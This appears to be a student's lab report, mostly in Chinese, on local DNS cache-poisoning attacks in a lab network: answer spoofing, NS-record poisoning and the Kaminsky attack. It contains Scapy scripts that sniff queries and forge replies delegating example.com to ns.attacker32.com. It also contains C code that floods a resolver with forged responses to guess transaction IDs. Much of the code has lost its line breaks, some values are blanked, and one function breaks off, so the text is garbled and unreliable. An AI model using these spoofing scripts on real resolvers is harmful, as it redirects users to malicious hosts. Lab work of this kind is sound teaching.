


2.1 测试 DNS 设置


域名解析 Answers 毒化

2、域名解析 NS 毒化

3、kaminsky 攻击


DNS (Domain Name System) is the Internet’s phone book; it translates hostnames to IP addresses (and vice versa). This translation is through DNS resolution, which happens behind the scene. DNS attacks manipulate this resolution process in various ways, with an intent to misdirect users to alternative destinations, which are often malicious. The objective of this lab is to understand how such attacks work. Students will fifirst set up and confifigure a DNS server, and then they will try various DNS attacks on the target that is also within the lab environment.

The diffificulties of attacking local victims versus remote DNS servers are quite different.Therefore, we have developed two labs, one focusing on local DNS attacks, and the other on remote DNS attack. This lab focuses on local attacks. This lab covers the following topics:

• DNS and how it works

• DNS server setup

• DNS cache poisoning attack

• Spoofifing DNS responses

• Packet sniffifing and spoofifing

• The Scapy tool


2.1 测试 DNS 设置

$ dig ns.attacker32.com

将查询发送到我们的本地 DNS 服务器,该服务器会将查询
发送到 example.com 的官方名称服务器。
$ dig www.example.com

将查询直接发送到 ns.attacker32.com
$ dig @ns.attacker32.com www.example.com


  1. 域名解析 Answers 毒化

实验步骤 :

1. 在局域网内监听 udp 和 53 端口的流量。

2. 监听到 User 发出 DNS 请求报文的时候,使用 scapy 构造 DNS 应答报文。


#!/usr/bin/env python3
from scapy.all import *def spoof_dns(pkt):if (DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')):    print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))       # Swap the source and destination IP addressIPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)       # Swap the source and destination port numberUDPpkt = UDP(dport=pkt[UDP].sport, sport=53)# The Answer SectionAnssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='')       # The Authority SectionNSsec = DNSRR(rrname='example.net', type='NS',ttl=259200, rdata='ns.attacker32.com')              # Construct the DNS packetDNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1,ancount=1,nscount=1,an=Anssec, ns=NSsec)# Construct the entire IP packet and send it outspoofpkt = IPpkt/UDPpkt/DNSpktsend(spoofpkt)# Sniff UDP query packets and invoke spoof_dns().
MyFilter = "udp and (src host and dst port 53)"
pkt = sniff(iface='br-812da271e1ab',filter=MyFilter, prn=spoof_dns)

3. 执行命令$ dig www.example.com ,记录结果并解释原因


4. 执行命令$ dig mail.example.com ,记录结果并解释原因。

5.停止运行攻击脚本之后,重复步骤 3,记录结果并解释原因。


2、域名解析 NS 毒化

实验步骤 :

1. 在本地域名服务器出口处监听 udp 和 53 端口的流量。

2. 监听到本地域名服务器发出 DNS 请求报文的时候,使用 scapy 构造 DNS 应答报文。

#!/usr/bin/env python3
from scapy.all import *
def spoof_dns(pkt):if (DNS in pkt and 'www.example.com' in pkt[DNS].qd.qname.decode('utf-8')):       print(pkt.sprintf("{DNS: %IP.src% --> %IP.dst%: %DNS.id%}"))       # Swap the source and destination IP addressIPpkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)      # Swap the source and destination port numberUDPpkt = UDP(dport=pkt[UDP].sport, sport=53)# The Answer SectionAnssec = DNSRR(rrname=pkt[DNS].qd.qname, type='A',ttl=259200, rdata='')       # The Authority SectionNSsec= DNSRR(rrname='example.com', type='NS',ttl=259200, rdata='ns.attacker32.com')            NSsec1=DNSRR(rrname='example.com',type='NS',ttl=259200,rdata='ns1.attacker32.com')         # Construct the DNS packetDNSpkt = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, rd=0, qr=1, qdcount=1,ancount=1,nscount=2,an=Anssec, ns=NSsec/NSsec1)# Construct the entire IP packet and send it outspoofpkt = IPpkt/UDPpkt/DNSpktsend(spoofpkt)
# Sniff UDP query packets and invoke spoof_dns().
MyFilter = "udp and (src host"
pkt = sniff(iface='br-812da271e1ab',filter=MyFilter, prn=spoof_dns)

3.执行命令$ dig www.example.com ,记录结果并解释原因

4.执行命令$ dig mail.example.com ,记录结果并解释原因

在scapy代码中实现NS记录的欺骗,攻击成功后,在用户机器上为example.com域中的任何主机名运行dig命令时,都将获得ns.attacker32.com提供的假IP地址 。

5.停止运行攻击脚本之后,重复步骤 3,记录结果并解释原因。


3、kaminsky 攻击

实验步骤 :

1.攻击者主动向本地 DNS 服务器发起 DNS 请求。

#!/usr/bin/env python3
from scapy.all import *srcIP = ''
dstIP = ''IPpkt = IP(dst=dstIP, src=srcIP)
UDPpkt = UDP(dport=53, sport=50945,chksum=0)Qdsec = DNSQR(qname='hello.example.com')
DNSpkt = DNS(id=0xAAAA,qr=0,qdcount=1,qd=Qdsec)spoofpkt = IPpkt/UDPpkt/DNSpktwith open('ip_req.bin','wb') as f:f.write(bytes(spoofpkt))

2.伪造 DNS 响应报文,在合法响应返回之前,将伪造报文发送至本地 DNS 服务器上。

#!/usr/bin/env python3
from scapy.all import *srcIP = ''
dstIP = ''IPpkt = IP(dst=dstIP, src=srcIP)
UDPpkt = UDP(dport=33333, sport=53,chksum=0)Qdsec = DNSQR(qname='hello.example.com')Anssec = DNSRR(rrname='hello.example.com', type='A',ttl=259200, rdata='')NSsec = DNSRR(rrname='example.com', type='NS',ttl=259200, rdata='ns.attacker32.com')            DNSpkt = DNS(id=0xAAAA,aa=1,rd=1,qr=0,qdcount=1,qd=Qdsec,ancount=1,an=Anssec,nscount=1,ns=NSsec)spoofpkt = IPpkt/UDPpkt/DNSpktwith open('ip_resp.bin','wb') as f:f.write(bytes(spoofpkt))


#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include<time.h>#define MAX_FILE_SIZE 2000
#define TARGET_IP ""
int send_packet_raw (int sock, char *ip, int n);
char* GenerateRand();int main()
{// Create raw socketint enable=1;int sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));//####read Query.bin to ip1[] Start #########FILE *f1 = fopen("ip_req.bin", "rb");if (!f1) {perror("Can't open 'ip_req.bin'");exit(0);} unsigned char ip1[MAX_FILE_SIZE];int n1 = fread(ip1, 1, MAX_FILE_SIZE, f1);//####read Query.bin End #########//####read Reply.bin to ip2[]  Start #########FILE *f2 = fopen("ip_resp.bin", "rb");if (!f2) {perror("Can't open 'ip_resp.bin'");exit(0);} unsigned char ip2[MAX_FILE_SIZE];int n2 = fread(ip2, 1, MAX_FILE_SIZE, f2);//####read Reply.bin End#########srand((unsigned)time(NULL));for(int temp=0;temp<200;temp++) //重复200次{// #######send query Begin ############char*name=GenerateRand();// Modify the name in the question field (offset=41)memcpy(ip1+41,name, 5); send_packet_raw(sock, ip1, n1);// #######send query End ############//  #######send Mult reply Begin #########//  Modify the name in the question field (offset=41)memcpy(ip2+41, name , 5); // Modify the name in the answer field (offset=64)memcpy(ip2+64,name, 5);// Modify the IP addr in the src IP field (offset=14)> c='\x87';memcpy(ip2+14,&c, 1);for (int id=1; id<400; id++){// Modify the transaction ID field (offset=28)unsigned short id_net_order;id_net_order = htons(id);memcpy(ip2+28, &id_net_order, 2); // Send the IP packet outsend_packet_raw(sock, ip2, n2);} // Modify the IP addr in the src IP field (offset=14)> c2='\x85';memcpy(ip2+14,&c2, 1); for (int id=1; id<400; id++){// Modify the transaction ID field (offset=28)unsigned short id_net_order;id_net_order = htons(id);memcpy(ip2+28, &id_net_order, 2); // Send the IP packet outsend_packet_raw(sock, ip2, n2);}// #######send Mult Reply End#########free(name);name=NULL; // A good habit for securityprintf("######\thave tried %d\t times, Start Next######### \n",temp);usleep(1000); //1000ms delay}close(sock);
}char* GenerateRand()
{char a[26]="abcdefghijklmnopqrstuvwxyz";
// Generate a random name of length 5char*name=malloc(5);for (int k=0; k<5; k++)name[k] = a[rand() % 26];return name;
}int send_packet_raw(int sock, char *ip, int n)
{struct sockaddr_in dest_info;dest_info.sin_family = AF_INET;dest_info.sin_addr.s_addr = inet_addr(TARGET_IP);int r = sendto(sock, ip, n, 0, (struct sockaddr *)&dest_info, sizeof(dest_info));

3.执行命令$ dig www.example.com ,记录结果并解释原因。



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